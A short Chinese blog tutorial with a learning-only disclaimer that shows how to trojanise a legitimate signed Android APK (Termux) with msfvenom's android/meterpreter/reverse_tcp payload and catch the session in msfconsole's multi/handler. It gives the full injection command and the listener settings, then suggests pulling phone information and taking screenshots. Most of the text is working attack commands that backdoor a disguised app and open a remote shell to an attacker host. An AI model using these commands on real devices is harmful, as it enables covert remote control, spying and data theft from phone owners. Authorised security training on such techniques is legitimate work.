欢迎光临
我们一直在努力

msfvenom生成apk后门,实现远程操控

声明:本文内容仅供网络安全学习与研究使用,请勿用于任何非法用途。作者对因使用本文内容而产生的任何直接或间接后果概不负责。请在合法合规的前提下进行测试,并确保已获得相关授权。

环境

  • kali 2024.4(虚拟机,网络模式为桥接模式)
  • apktool 2.11.1
  • 测试手机:荣耀20S

步骤

  • 下载一个简单且已经签名过的apk作为模板,我选择的是termux(https://github.com/termux/termux-app/releases#release-v0.118.0),下载完成后重命名为template.apk
  • 查看自己的虚拟机ip地址(必须是桥接模式,不能是NAT),然后进行注入,之后将生成的新的apk安装到手机上
  • msfvenom -p android/meterpreter/reverse_tcp LHOST=10.211.101.114 LPORT=4444 -x template.apk -o test.apk

  • 开启msfconsole,测试手机启动app,等待TCP连接成功
  • use exploit/multi/handler
    set payload android/meterpreter/reverse_tcp
    set LHOST 10.211.101.114
    set LPORT 4444
    run

  • 尝试查看测试手机信息、截图等操作
  • 赞(0)
    未经允许不得转载:171主机测评 » msfvenom生成apk后门,实现远程操控
    分享到: 更多 (0)

    评论 抢沙发

    • 昵称 (必填)
    • 邮箱 (必填)
    • 网址